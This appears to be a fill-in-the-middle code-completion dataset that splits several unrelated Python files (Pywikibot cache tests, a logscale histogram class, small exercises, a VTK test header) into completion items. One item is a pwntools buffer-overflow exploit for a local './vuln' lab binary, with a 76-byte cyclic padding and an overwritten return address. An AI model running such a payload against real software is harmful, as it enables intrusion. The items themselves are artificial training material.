from __future__ import unicode_literals
__version__ = '$Id$'
#
from pywikibot.site import BaseSite
import scripts.maintenance.cache as cache
from tests import _cache_dir
from tests.aspects import unittest, TestCase
class RequestCacheTests(TestCase):
"""Validate cache entries."""
net = False
def _check_cache_entry(self, entry):
<|fim_middle|>
def test_cache(self):
"""Test the apicache by doing _check_cache_entry over each entry."""
cache.process_entries(_cache_dir, self._check_cache_entry)
if __name__ == '__main__':
unittest.main()
<|fim▁end|> | """Assert validity of the cache entry."""
self.assertIsInstance(entry.site, BaseSite)
self.assertIsInstance(entry.site._loginstatus, int)
self.assertIsInstance(entry.site._username, list)
if entry.site._loginstatus >= 1:
self.assertIsNotNone(entry.site._username[0])
self.assertIsInstance(entry._params, dict)
self.assertIsNotNone(entry._params)
# TODO: more tests on entry._params, and possibly fixes needed
# to make it closely replicate the original object. |
<|file_name|>cache_tests.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
"""API Request cache tests."""
#
# (C) Pywikibot team, 2012-2014
#
# Distributed under the terms of the MIT license.
#
from __future__ import unicode_literals
__version__ = '$Id$'
#
from pywikibot.site import BaseSite
import scripts.maintenance.cache as cache
from tests import _cache_dir
from tests.aspects import unittest, TestCase
class RequestCacheTests(TestCase):
"""Validate cache entries."""
net = False
def _check_cache_entry(self, entry):
"""Assert validity of the cache entry."""
self.assertIsInstance(entry.site, BaseSite)
self.assertIsInstance(entry.site._loginstatus, int)
self.assertIsInstance(entry.site._username, list)
if entry.site._loginstatus >= 1:
self.assertIsNotNone(entry.site._username[0])
self.assertIsInstance(entry._params, dict)
self.assertIsNotNone(entry._params)
# TODO: more tests on entry._params, and possibly fixes needed
# to make it closely replicate the original object.
def test_cache(self):
<|fim_middle|>
if __name__ == '__main__':
unittest.main()
<|fim▁end|> | """Test the apicache by doing _check_cache_entry over each entry."""
cache.process_entries(_cache_dir, self._check_cache_entry) |
<|file_name|>cache_tests.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
"""API Request cache tests."""
#
# (C) Pywikibot team, 2012-2014
#
# Distributed under the terms of the MIT license.
#
from __future__ import unicode_literals
__version__ = '$Id$'
#
from pywikibot.site import BaseSite
import scripts.maintenance.cache as cache
from tests import _cache_dir
from tests.aspects import unittest, TestCase
class RequestCacheTests(TestCase):
"""Validate cache entries."""
net = False
def _check_cache_entry(self, entry):
"""Assert validity of the cache entry."""
self.assertIsInstance(entry.site, BaseSite)
self.assertIsInstance(entry.site._loginstatus, int)
self.assertIsInstance(entry.site._username, list)
if entry.site._loginstatus >= 1:
<|fim_middle|>
self.assertIsInstance(entry._params, dict)
self.assertIsNotNone(entry._params)
# TODO: more tests on entry._params, and possibly fixes needed
# to make it closely replicate the original object.
def test_cache(self):
"""Test the apicache by doing _check_cache_entry over each entry."""
cache.process_entries(_cache_dir, self._check_cache_entry)
if __name__ == '__main__':
unittest.main()
<|fim▁end|> | self.assertIsNotNone(entry.site._username[0]) |
<|file_name|>cache_tests.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
"""API Request cache tests."""
#
# (C) Pywikibot team, 2012-2014
#
# Distributed under the terms of the MIT license.
#
from __future__ import unicode_literals
__version__ = '$Id$'
#
from pywikibot.site import BaseSite
import scripts.maintenance.cache as cache
from tests import _cache_dir
from tests.aspects import unittest, TestCase
class RequestCacheTests(TestCase):
"""Validate cache entries."""
net = False
def _check_cache_entry(self, entry):
"""Assert validity of the cache entry."""
self.assertIsInstance(entry.site, BaseSite)
self.assertIsInstance(entry.site._loginstatus, int)
self.assertIsInstance(entry.site._username, list)
if entry.site._loginstatus >= 1:
self.assertIsNotNone(entry.site._username[0])
self.assertIsInstance(entry._params, dict)
self.assertIsNotNone(entry._params)
# TODO: more tests on entry._params, and possibly fixes needed
# to make it closely replicate the original object.
def test_cache(self):
"""Test the apicache by doing _check_cache_entry over each entry."""
cache.process_entries(_cache_dir, self._check_cache_entry)
if __name__ == '__main__':
<|fim_middle|>
<|fim▁end|> | unittest.main() |
<|file_name|>cache_tests.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
"""API Request cache tests."""
#
# (C) Pywikibot team, 2012-2014
#
# Distributed under the terms of the MIT license.
#
from __future__ import unicode_literals
__version__ = '$Id$'
#
from pywikibot.site import BaseSite
import scripts.maintenance.cache as cache
from tests import _cache_dir
from tests.aspects import unittest, TestCase
class RequestCacheTests(TestCase):
"""Validate cache entries."""
net = False
def <|fim_middle|>(self, entry):
"""Assert validity of the cache entry."""
self.assertIsInstance(entry.site, BaseSite)
self.assertIsInstance(entry.site._loginstatus, int)
self.assertIsInstance(entry.site._username, list)
if entry.site._loginstatus >= 1:
self.assertIsNotNone(entry.site._username[0])
self.assertIsInstance(entry._params, dict)
self.assertIsNotNone(entry._params)
# TODO: more tests on entry._params, and possibly fixes needed
# to make it closely replicate the original object.
def test_cache(self):
"""Test the apicache by doing _check_cache_entry over each entry."""
cache.process_entries(_cache_dir, self._check_cache_entry)
if __name__ == '__main__':
unittest.main()
<|fim▁end|> | _check_cache_entry |
<|file_name|>cache_tests.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
"""API Request cache tests."""
#
# (C) Pywikibot team, 2012-2014
#
# Distributed under the terms of the MIT license.
#
from __future__ import unicode_literals
__version__ = '$Id$'
#
from pywikibot.site import BaseSite
import scripts.maintenance.cache as cache
from tests import _cache_dir
from tests.aspects import unittest, TestCase
class RequestCacheTests(TestCase):
"""Validate cache entries."""
net = False
def _check_cache_entry(self, entry):
"""Assert validity of the cache entry."""
self.assertIsInstance(entry.site, BaseSite)
self.assertIsInstance(entry.site._loginstatus, int)
self.assertIsInstance(entry.site._username, list)
if entry.site._loginstatus >= 1:
self.assertIsNotNone(entry.site._username[0])
self.assertIsInstance(entry._params, dict)
self.assertIsNotNone(entry._params)
# TODO: more tests on entry._params, and possibly fixes needed
# to make it closely replicate the original object.
def <|fim_middle|>(self):
"""Test the apicache by doing _check_cache_entry over each entry."""
cache.process_entries(_cache_dir, self._check_cache_entry)
if __name__ == '__main__':
unittest.main()
<|fim▁end|> | test_cache |
<|file_name|>histogram_logscale.py<|end_file_name|><|fim▁begin|>"""
================================================================================
Logscaled Histogram
================================================================================
| Calculates a logarithmically spaced histogram for a data map.
| Written By: Matthew Stadelman
| Date Written: 2016/03/07
| Last Modifed: 2016/10/20
"""
import scipy as sp
from .histogram import Histogram
class HistogramLogscale(Histogram):
r"""
Performs a histogram where the bin limits are logarithmically spaced
based on the supplied scale factor. If there are negative values then
the first bin contains everything below 0, the next bin will contain
everything between 0 and 1.
kwargs include:
scale_fact - numeric value to generate axis scale for bins. A
scale fact of 10 creates bins: 0-1, 1-10, 10-100, etc.
"""
def __init__(self, field, **kwargs):
super().__init__(field)<|fim▁hole|> self.args.update(kwargs)
self.output_key = 'hist_logscale'
self.action = 'histogram_logscale'
@classmethod
def _add_subparser(cls, subparsers, parent):
r"""
Adds a specific action based sub-parser to the supplied arg_parser
instance.
"""
parser = subparsers.add_parser(cls.__name__,
aliases=['histlog'],
parents=[parent],
help=cls.__doc__)
#
parser.add_argument('scale_fact', type=float, nargs='?', default=10.0,
help='base to generate logscale from')
parser.set_defaults(func=cls)
def define_bins(self, **kwargs):
r"""
This defines the bins for a logscaled histogram
"""
self.data_vector.sort()
sf = self.args['scale_fact']
num_bins = int(sp.logn(sf, self.data_vector[-1]) + 1)
#
# generating initial bins from 1 - sf**num_bins
low = list(sp.logspace(0, num_bins, num_bins + 1, base=sf))[:-1]
high = list(sp.logspace(0, num_bins, num_bins + 1, base=sf))[1:]
#
# Adding "catch all" bins for anything between 0 - 1 and less than 0
if self.data_vector[0] < 1.0:
low.insert(0, 0.0)
high.insert(0, 1.0)
if self.data_vector[0] < 0.0:
low.insert(0, self.data_vector[0])
high.insert(0, 0.0)
#
self.bins = [bin_ for bin_ in zip(low, high)]<|fim▁end|> | |
<|file_name|>histogram_logscale.py<|end_file_name|><|fim▁begin|>"""
================================================================================
Logscaled Histogram
================================================================================
| Calculates a logarithmically spaced histogram for a data map.
| Written By: Matthew Stadelman
| Date Written: 2016/03/07
| Last Modifed: 2016/10/20
"""
import scipy as sp
from .histogram import Histogram
class HistogramLogscale(Histogram):
<|fim_middle|>
<|fim▁end|> | r"""
Performs a histogram where the bin limits are logarithmically spaced
based on the supplied scale factor. If there are negative values then
the first bin contains everything below 0, the next bin will contain
everything between 0 and 1.
kwargs include:
scale_fact - numeric value to generate axis scale for bins. A
scale fact of 10 creates bins: 0-1, 1-10, 10-100, etc.
"""
def __init__(self, field, **kwargs):
super().__init__(field)
self.args.update(kwargs)
self.output_key = 'hist_logscale'
self.action = 'histogram_logscale'
@classmethod
def _add_subparser(cls, subparsers, parent):
r"""
Adds a specific action based sub-parser to the supplied arg_parser
instance.
"""
parser = subparsers.add_parser(cls.__name__,
aliases=['histlog'],
parents=[parent],
help=cls.__doc__)
#
parser.add_argument('scale_fact', type=float, nargs='?', default=10.0,
help='base to generate logscale from')
parser.set_defaults(func=cls)
def define_bins(self, **kwargs):
r"""
This defines the bins for a logscaled histogram
"""
self.data_vector.sort()
sf = self.args['scale_fact']
num_bins = int(sp.logn(sf, self.data_vector[-1]) + 1)
#
# generating initial bins from 1 - sf**num_bins
low = list(sp.logspace(0, num_bins, num_bins + 1, base=sf))[:-1]
high = list(sp.logspace(0, num_bins, num_bins + 1, base=sf))[1:]
#
# Adding "catch all" bins for anything between 0 - 1 and less than 0
if self.data_vector[0] < 1.0:
low.insert(0, 0.0)
high.insert(0, 1.0)
if self.data_vector[0] < 0.0:
low.insert(0, self.data_vector[0])
high.insert(0, 0.0)
#
self.bins = [bin_ for bin_ in zip(low, high)] |
<|file_name|>histogram_logscale.py<|end_file_name|><|fim▁begin|>"""
================================================================================
Logscaled Histogram
================================================================================
| Calculates a logarithmically spaced histogram for a data map.
| Written By: Matthew Stadelman
| Date Written: 2016/03/07
| Last Modifed: 2016/10/20
"""
import scipy as sp
from .histogram import Histogram
class HistogramLogscale(Histogram):
r"""
Performs a histogram where the bin limits are logarithmically spaced
based on the supplied scale factor. If there are negative values then
the first bin contains everything below 0, the next bin will contain
everything between 0 and 1.
kwargs include:
scale_fact - numeric value to generate axis scale for bins. A
scale fact of 10 creates bins: 0-1, 1-10, 10-100, etc.
"""
def __init__(self, field, **kwargs):
<|fim_middle|>
@classmethod
def _add_subparser(cls, subparsers, parent):
r"""
Adds a specific action based sub-parser to the supplied arg_parser
instance.
"""
parser = subparsers.add_parser(cls.__name__,
aliases=['histlog'],
parents=[parent],
help=cls.__doc__)
#
parser.add_argument('scale_fact', type=float, nargs='?', default=10.0,
help='base to generate logscale from')
parser.set_defaults(func=cls)
def define_bins(self, **kwargs):
r"""
This defines the bins for a logscaled histogram
"""
self.data_vector.sort()
sf = self.args['scale_fact']
num_bins = int(sp.logn(sf, self.data_vector[-1]) + 1)
#
# generating initial bins from 1 - sf**num_bins
low = list(sp.logspace(0, num_bins, num_bins + 1, base=sf))[:-1]
high = list(sp.logspace(0, num_bins, num_bins + 1, base=sf))[1:]
#
# Adding "catch all" bins for anything between 0 - 1 and less than 0
if self.data_vector[0] < 1.0:
low.insert(0, 0.0)
high.insert(0, 1.0)
if self.data_vector[0] < 0.0:
low.insert(0, self.data_vector[0])
high.insert(0, 0.0)
#
self.bins = [bin_ for bin_ in zip(low, high)]
<|fim▁end|> | super().__init__(field)
self.args.update(kwargs)
self.output_key = 'hist_logscale'
self.action = 'histogram_logscale' |
<|file_name|>histogram_logscale.py<|end_file_name|><|fim▁begin|>"""
================================================================================
Logscaled Histogram
================================================================================
| Calculates a logarithmically spaced histogram for a data map.
| Written By: Matthew Stadelman
| Date Written: 2016/03/07
| Last Modifed: 2016/10/20
"""
import scipy as sp
from .histogram import Histogram
class HistogramLogscale(Histogram):
r"""
Performs a histogram where the bin limits are logarithmically spaced
based on the supplied scale factor. If there are negative values then
the first bin contains everything below 0, the next bin will contain
everything between 0 and 1.
kwargs include:
scale_fact - numeric value to generate axis scale for bins. A
scale fact of 10 creates bins: 0-1, 1-10, 10-100, etc.
"""
def __init__(self, field, **kwargs):
super().__init__(field)
self.args.update(kwargs)
self.output_key = 'hist_logscale'
self.action = 'histogram_logscale'
@classmethod
def _add_subparser(cls, subparsers, parent):
<|fim_middle|>
def define_bins(self, **kwargs):
r"""
This defines the bins for a logscaled histogram
"""
self.data_vector.sort()
sf = self.args['scale_fact']
num_bins = int(sp.logn(sf, self.data_vector[-1]) + 1)
#
# generating initial bins from 1 - sf**num_bins
low = list(sp.logspace(0, num_bins, num_bins + 1, base=sf))[:-1]
high = list(sp.logspace(0, num_bins, num_bins + 1, base=sf))[1:]
#
# Adding "catch all" bins for anything between 0 - 1 and less than 0
if self.data_vector[0] < 1.0:
low.insert(0, 0.0)
high.insert(0, 1.0)
if self.data_vector[0] < 0.0:
low.insert(0, self.data_vector[0])
high.insert(0, 0.0)
#
self.bins = [bin_ for bin_ in zip(low, high)]
<|fim▁end|> | r"""
Adds a specific action based sub-parser to the supplied arg_parser
instance.
"""
parser = subparsers.add_parser(cls.__name__,
aliases=['histlog'],
parents=[parent],
help=cls.__doc__)
#
parser.add_argument('scale_fact', type=float, nargs='?', default=10.0,
help='base to generate logscale from')
parser.set_defaults(func=cls) |
<|file_name|>histogram_logscale.py<|end_file_name|><|fim▁begin|>"""
================================================================================
Logscaled Histogram
================================================================================
| Calculates a logarithmically spaced histogram for a data map.
| Written By: Matthew Stadelman
| Date Written: 2016/03/07
| Last Modifed: 2016/10/20
"""
import scipy as sp
from .histogram import Histogram
class HistogramLogscale(Histogram):
r"""
Performs a histogram where the bin limits are logarithmically spaced
based on the supplied scale factor. If there are negative values then
the first bin contains everything below 0, the next bin will contain
everything between 0 and 1.
kwargs include:
scale_fact - numeric value to generate axis scale for bins. A
scale fact of 10 creates bins: 0-1, 1-10, 10-100, etc.
"""
def __init__(self, field, **kwargs):
super().__init__(field)
self.args.update(kwargs)
self.output_key = 'hist_logscale'
self.action = 'histogram_logscale'
@classmethod
def _add_subparser(cls, subparsers, parent):
r"""
Adds a specific action based sub-parser to the supplied arg_parser
instance.
"""
parser = subparsers.add_parser(cls.__name__,
aliases=['histlog'],
parents=[parent],
help=cls.__doc__)
#
parser.add_argument('scale_fact', type=float, nargs='?', default=10.0,
help='base to generate logscale from')
parser.set_defaults(func=cls)
def define_bins(self, **kwargs):
<|fim_middle|>
<|fim▁end|> | r"""
This defines the bins for a logscaled histogram
"""
self.data_vector.sort()
sf = self.args['scale_fact']
num_bins = int(sp.logn(sf, self.data_vector[-1]) + 1)
#
# generating initial bins from 1 - sf**num_bins
low = list(sp.logspace(0, num_bins, num_bins + 1, base=sf))[:-1]
high = list(sp.logspace(0, num_bins, num_bins + 1, base=sf))[1:]
#
# Adding "catch all" bins for anything between 0 - 1 and less than 0
if self.data_vector[0] < 1.0:
low.insert(0, 0.0)
high.insert(0, 1.0)
if self.data_vector[0] < 0.0:
low.insert(0, self.data_vector[0])
high.insert(0, 0.0)
#
self.bins = [bin_ for bin_ in zip(low, high)] |
<|file_name|>histogram_logscale.py<|end_file_name|><|fim▁begin|>"""
================================================================================
Logscaled Histogram
================================================================================
| Calculates a logarithmically spaced histogram for a data map.
| Written By: Matthew Stadelman
| Date Written: 2016/03/07
| Last Modifed: 2016/10/20
"""
import scipy as sp
from .histogram import Histogram
class HistogramLogscale(Histogram):
r"""
Performs a histogram where the bin limits are logarithmically spaced
based on the supplied scale factor. If there are negative values then
the first bin contains everything below 0, the next bin will contain
everything between 0 and 1.
kwargs include:
scale_fact - numeric value to generate axis scale for bins. A
scale fact of 10 creates bins: 0-1, 1-10, 10-100, etc.
"""
def __init__(self, field, **kwargs):
super().__init__(field)
self.args.update(kwargs)
self.output_key = 'hist_logscale'
self.action = 'histogram_logscale'
@classmethod
def _add_subparser(cls, subparsers, parent):
r"""
Adds a specific action based sub-parser to the supplied arg_parser
instance.
"""
parser = subparsers.add_parser(cls.__name__,
aliases=['histlog'],
parents=[parent],
help=cls.__doc__)
#
parser.add_argument('scale_fact', type=float, nargs='?', default=10.0,
help='base to generate logscale from')
parser.set_defaults(func=cls)
def define_bins(self, **kwargs):
r"""
This defines the bins for a logscaled histogram
"""
self.data_vector.sort()
sf = self.args['scale_fact']
num_bins = int(sp.logn(sf, self.data_vector[-1]) + 1)
#
# generating initial bins from 1 - sf**num_bins
low = list(sp.logspace(0, num_bins, num_bins + 1, base=sf))[:-1]
high = list(sp.logspace(0, num_bins, num_bins + 1, base=sf))[1:]
#
# Adding "catch all" bins for anything between 0 - 1 and less than 0
if self.data_vector[0] < 1.0:
<|fim_middle|>
if self.data_vector[0] < 0.0:
low.insert(0, self.data_vector[0])
high.insert(0, 0.0)
#
self.bins = [bin_ for bin_ in zip(low, high)]
<|fim▁end|> | low.insert(0, 0.0)
high.insert(0, 1.0) |
<|file_name|>histogram_logscale.py<|end_file_name|><|fim▁begin|>"""
================================================================================
Logscaled Histogram
================================================================================
| Calculates a logarithmically spaced histogram for a data map.
| Written By: Matthew Stadelman
| Date Written: 2016/03/07
| Last Modifed: 2016/10/20
"""
import scipy as sp
from .histogram import Histogram
class HistogramLogscale(Histogram):
r"""
Performs a histogram where the bin limits are logarithmically spaced
based on the supplied scale factor. If there are negative values then
the first bin contains everything below 0, the next bin will contain
everything between 0 and 1.
kwargs include:
scale_fact - numeric value to generate axis scale for bins. A
scale fact of 10 creates bins: 0-1, 1-10, 10-100, etc.
"""
def __init__(self, field, **kwargs):
super().__init__(field)
self.args.update(kwargs)
self.output_key = 'hist_logscale'
self.action = 'histogram_logscale'
@classmethod
def _add_subparser(cls, subparsers, parent):
r"""
Adds a specific action based sub-parser to the supplied arg_parser
instance.
"""
parser = subparsers.add_parser(cls.__name__,
aliases=['histlog'],
parents=[parent],
help=cls.__doc__)
#
parser.add_argument('scale_fact', type=float, nargs='?', default=10.0,
help='base to generate logscale from')
parser.set_defaults(func=cls)
def define_bins(self, **kwargs):
r"""
This defines the bins for a logscaled histogram
"""
self.data_vector.sort()
sf = self.args['scale_fact']
num_bins = int(sp.logn(sf, self.data_vector[-1]) + 1)
#
# generating initial bins from 1 - sf**num_bins
low = list(sp.logspace(0, num_bins, num_bins + 1, base=sf))[:-1]
high = list(sp.logspace(0, num_bins, num_bins + 1, base=sf))[1:]
#
# Adding "catch all" bins for anything between 0 - 1 and less than 0
if self.data_vector[0] < 1.0:
low.insert(0, 0.0)
high.insert(0, 1.0)
if self.data_vector[0] < 0.0:
<|fim_middle|>
#
self.bins = [bin_ for bin_ in zip(low, high)]
<|fim▁end|> | low.insert(0, self.data_vector[0])
high.insert(0, 0.0) |
<|file_name|>histogram_logscale.py<|end_file_name|><|fim▁begin|>"""
================================================================================
Logscaled Histogram
================================================================================
| Calculates a logarithmically spaced histogram for a data map.
| Written By: Matthew Stadelman
| Date Written: 2016/03/07
| Last Modifed: 2016/10/20
"""
import scipy as sp
from .histogram import Histogram
class HistogramLogscale(Histogram):
r"""
Performs a histogram where the bin limits are logarithmically spaced
based on the supplied scale factor. If there are negative values then
the first bin contains everything below 0, the next bin will contain
everything between 0 and 1.
kwargs include:
scale_fact - numeric value to generate axis scale for bins. A
scale fact of 10 creates bins: 0-1, 1-10, 10-100, etc.
"""
def <|fim_middle|>(self, field, **kwargs):
super().__init__(field)
self.args.update(kwargs)
self.output_key = 'hist_logscale'
self.action = 'histogram_logscale'
@classmethod
def _add_subparser(cls, subparsers, parent):
r"""
Adds a specific action based sub-parser to the supplied arg_parser
instance.
"""
parser = subparsers.add_parser(cls.__name__,
aliases=['histlog'],
parents=[parent],
help=cls.__doc__)
#
parser.add_argument('scale_fact', type=float, nargs='?', default=10.0,
help='base to generate logscale from')
parser.set_defaults(func=cls)
def define_bins(self, **kwargs):
r"""
This defines the bins for a logscaled histogram
"""
self.data_vector.sort()
sf = self.args['scale_fact']
num_bins = int(sp.logn(sf, self.data_vector[-1]) + 1)
#
# generating initial bins from 1 - sf**num_bins
low = list(sp.logspace(0, num_bins, num_bins + 1, base=sf))[:-1]
high = list(sp.logspace(0, num_bins, num_bins + 1, base=sf))[1:]
#
# Adding "catch all" bins for anything between 0 - 1 and less than 0
if self.data_vector[0] < 1.0:
low.insert(0, 0.0)
high.insert(0, 1.0)
if self.data_vector[0] < 0.0:
low.insert(0, self.data_vector[0])
high.insert(0, 0.0)
#
self.bins = [bin_ for bin_ in zip(low, high)]
<|fim▁end|> | __init__ |
<|file_name|>histogram_logscale.py<|end_file_name|><|fim▁begin|>"""
================================================================================
Logscaled Histogram
================================================================================
| Calculates a logarithmically spaced histogram for a data map.
| Written By: Matthew Stadelman
| Date Written: 2016/03/07
| Last Modifed: 2016/10/20
"""
import scipy as sp
from .histogram import Histogram
class HistogramLogscale(Histogram):
r"""
Performs a histogram where the bin limits are logarithmically spaced
based on the supplied scale factor. If there are negative values then
the first bin contains everything below 0, the next bin will contain
everything between 0 and 1.
kwargs include:
scale_fact - numeric value to generate axis scale for bins. A
scale fact of 10 creates bins: 0-1, 1-10, 10-100, etc.
"""
def __init__(self, field, **kwargs):
super().__init__(field)
self.args.update(kwargs)
self.output_key = 'hist_logscale'
self.action = 'histogram_logscale'
@classmethod
def <|fim_middle|>(cls, subparsers, parent):
r"""
Adds a specific action based sub-parser to the supplied arg_parser
instance.
"""
parser = subparsers.add_parser(cls.__name__,
aliases=['histlog'],
parents=[parent],
help=cls.__doc__)
#
parser.add_argument('scale_fact', type=float, nargs='?', default=10.0,
help='base to generate logscale from')
parser.set_defaults(func=cls)
def define_bins(self, **kwargs):
r"""
This defines the bins for a logscaled histogram
"""
self.data_vector.sort()
sf = self.args['scale_fact']
num_bins = int(sp.logn(sf, self.data_vector[-1]) + 1)
#
# generating initial bins from 1 - sf**num_bins
low = list(sp.logspace(0, num_bins, num_bins + 1, base=sf))[:-1]
high = list(sp.logspace(0, num_bins, num_bins + 1, base=sf))[1:]
#
# Adding "catch all" bins for anything between 0 - 1 and less than 0
if self.data_vector[0] < 1.0:
low.insert(0, 0.0)
high.insert(0, 1.0)
if self.data_vector[0] < 0.0:
low.insert(0, self.data_vector[0])
high.insert(0, 0.0)
#
self.bins = [bin_ for bin_ in zip(low, high)]
<|fim▁end|> | _add_subparser |
<|file_name|>histogram_logscale.py<|end_file_name|><|fim▁begin|>"""
================================================================================
Logscaled Histogram
================================================================================
| Calculates a logarithmically spaced histogram for a data map.
| Written By: Matthew Stadelman
| Date Written: 2016/03/07
| Last Modifed: 2016/10/20
"""
import scipy as sp
from .histogram import Histogram
class HistogramLogscale(Histogram):
r"""
Performs a histogram where the bin limits are logarithmically spaced
based on the supplied scale factor. If there are negative values then
the first bin contains everything below 0, the next bin will contain
everything between 0 and 1.
kwargs include:
scale_fact - numeric value to generate axis scale for bins. A
scale fact of 10 creates bins: 0-1, 1-10, 10-100, etc.
"""
def __init__(self, field, **kwargs):
super().__init__(field)
self.args.update(kwargs)
self.output_key = 'hist_logscale'
self.action = 'histogram_logscale'
@classmethod
def _add_subparser(cls, subparsers, parent):
r"""
Adds a specific action based sub-parser to the supplied arg_parser
instance.
"""
parser = subparsers.add_parser(cls.__name__,
aliases=['histlog'],
parents=[parent],
help=cls.__doc__)
#
parser.add_argument('scale_fact', type=float, nargs='?', default=10.0,
help='base to generate logscale from')
parser.set_defaults(func=cls)
def <|fim_middle|>(self, **kwargs):
r"""
This defines the bins for a logscaled histogram
"""
self.data_vector.sort()
sf = self.args['scale_fact']
num_bins = int(sp.logn(sf, self.data_vector[-1]) + 1)
#
# generating initial bins from 1 - sf**num_bins
low = list(sp.logspace(0, num_bins, num_bins + 1, base=sf))[:-1]
high = list(sp.logspace(0, num_bins, num_bins + 1, base=sf))[1:]
#
# Adding "catch all" bins for anything between 0 - 1 and less than 0
if self.data_vector[0] < 1.0:
low.insert(0, 0.0)
high.insert(0, 1.0)
if self.data_vector[0] < 0.0:
low.insert(0, self.data_vector[0])
high.insert(0, 0.0)
#
self.bins = [bin_ for bin_ in zip(low, high)]
<|fim▁end|> | define_bins |
<|file_name|>problem_001.py<|end_file_name|><|fim▁begin|>from __future__ import division, print_function #, unicode_literals
"""
Multiples of 3 and 5
<|fim▁hole|>
Find the sum of all the multiples of 3 or 5 below 1000.
"""
import numpy as np
# Setup.
num_max = 1000
basis = [3, 5]
factors = []
for i in range(num_max):
for k in basis:
if not i % k:
factors.append(i)
break
print('\nRange: {:d}'.format(num_max))
print('Number of factors: {:d}'.format(len(factors)))
print('The answer: {:d}'.format(np.sum(factors)))
# Done.<|fim▁end|> | If we list all the natural numbers below 10 that are multiples
of 3 or 5, we get 3, 5, 6 and 9. The sum of these multiples is 23. |
<|file_name|>problem_001.py<|end_file_name|><|fim▁begin|>
from __future__ import division, print_function #, unicode_literals
"""
Multiples of 3 and 5
If we list all the natural numbers below 10 that are multiples
of 3 or 5, we get 3, 5, 6 and 9. The sum of these multiples is 23.
Find the sum of all the multiples of 3 or 5 below 1000.
"""
import numpy as np
# Setup.
num_max = 1000
basis = [3, 5]
factors = []
for i in range(num_max):
for k in basis:
if not i % k:
<|fim_middle|>
print('\nRange: {:d}'.format(num_max))
print('Number of factors: {:d}'.format(len(factors)))
print('The answer: {:d}'.format(np.sum(factors)))
# Done.
<|fim▁end|> | factors.append(i)
break |
<|file_name|>exploit_overflow-1.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template ./vuln
from pwn import *
# Set up pwntools for the correct architecture
exe = context.binary = ELF('./vuln')
def start(argv=[], *a, **kw):
'''Start the exploit against the target.'''
if args.GDB:
return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
else:<|fim▁hole|>break *0x{exe.symbols.main:x}
continue
'''.format(**locals())
io = start()
payload = cyclic(76)
#payload = 'A'*64
payload += p32(0x80485e6)
io.sendline(payload)
io.interactive()<|fim▁end|> | return process([exe.path] + argv, *a, **kw)
gdbscript = ''' |
<|file_name|>exploit_overflow-1.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template ./vuln
from pwn import *
# Set up pwntools for the correct architecture
exe = context.binary = ELF('./vuln')
def start(argv=[], *a, **kw):
<|fim_middle|>
gdbscript = '''
break *0x{exe.symbols.main:x}
continue
'''.format(**locals())
io = start()
payload = cyclic(76)
#payload = 'A'*64
payload += p32(0x80485e6)
io.sendline(payload)
io.interactive()
<|fim▁end|> | '''Start the exploit against the target.'''
if args.GDB:
return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe.path] + argv, *a, **kw) |
<|file_name|>exploit_overflow-1.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template ./vuln
from pwn import *
# Set up pwntools for the correct architecture
exe = context.binary = ELF('./vuln')
def start(argv=[], *a, **kw):
'''Start the exploit against the target.'''
if args.GDB:
<|fim_middle|>
else:
return process([exe.path] + argv, *a, **kw)
gdbscript = '''
break *0x{exe.symbols.main:x}
continue
'''.format(**locals())
io = start()
payload = cyclic(76)
#payload = 'A'*64
payload += p32(0x80485e6)
io.sendline(payload)
io.interactive()
<|fim▁end|> | return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw) |
<|file_name|>exploit_overflow-1.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template ./vuln
from pwn import *
# Set up pwntools for the correct architecture
exe = context.binary = ELF('./vuln')
def start(argv=[], *a, **kw):
'''Start the exploit against the target.'''
if args.GDB:
return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
else:
<|fim_middle|>
gdbscript = '''
break *0x{exe.symbols.main:x}
continue
'''.format(**locals())
io = start()
payload = cyclic(76)
#payload = 'A'*64
payload += p32(0x80485e6)
io.sendline(payload)
io.interactive()
<|fim▁end|> | return process([exe.path] + argv, *a, **kw) |
<|file_name|>exploit_overflow-1.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template ./vuln
from pwn import *
# Set up pwntools for the correct architecture
exe = context.binary = ELF('./vuln')
def <|fim_middle|>(argv=[], *a, **kw):
'''Start the exploit against the target.'''
if args.GDB:
return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe.path] + argv, *a, **kw)
gdbscript = '''
break *0x{exe.symbols.main:x}
continue
'''.format(**locals())
io = start()
payload = cyclic(76)
#payload = 'A'*64
payload += p32(0x80485e6)
io.sendline(payload)
io.interactive()
<|fim▁end|> | start |
<|file_name|>spaceship_building.py<|end_file_name|><|fim▁begin|>def spaceship_building(cans):
total_cans = 0
for week in range(1,53):
total_cans = total_cans + cans
print('Week %s = %s cans' % (week, total_cans))<|fim▁hole|>spaceship_building(13)<|fim▁end|> |
spaceship_building(2)
|
<|file_name|>spaceship_building.py<|end_file_name|><|fim▁begin|>def spaceship_building(cans):
<|fim_middle|>
spaceship_building(2)
spaceship_building(13)<|fim▁end|> | total_cans = 0
for week in range(1,53):
total_cans = total_cans + cans
print('Week %s = %s cans' % (week, total_cans)) |
<|file_name|>spaceship_building.py<|end_file_name|><|fim▁begin|>def <|fim_middle|>(cans):
total_cans = 0
for week in range(1,53):
total_cans = total_cans + cans
print('Week %s = %s cans' % (week, total_cans))
spaceship_building(2)
spaceship_building(13)<|fim▁end|> | spaceship_building |
<|file_name|>TestMNITagPoints.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
import os
import vtk
from vtk.test import Testing
from vtk.util.misc import vtkGetDataRoot
VTK_DATA_ROOT = vtkGetDataRoot()
# Test label reading from an MNI tag file
#
# The current directory must be writeable.
#
try:
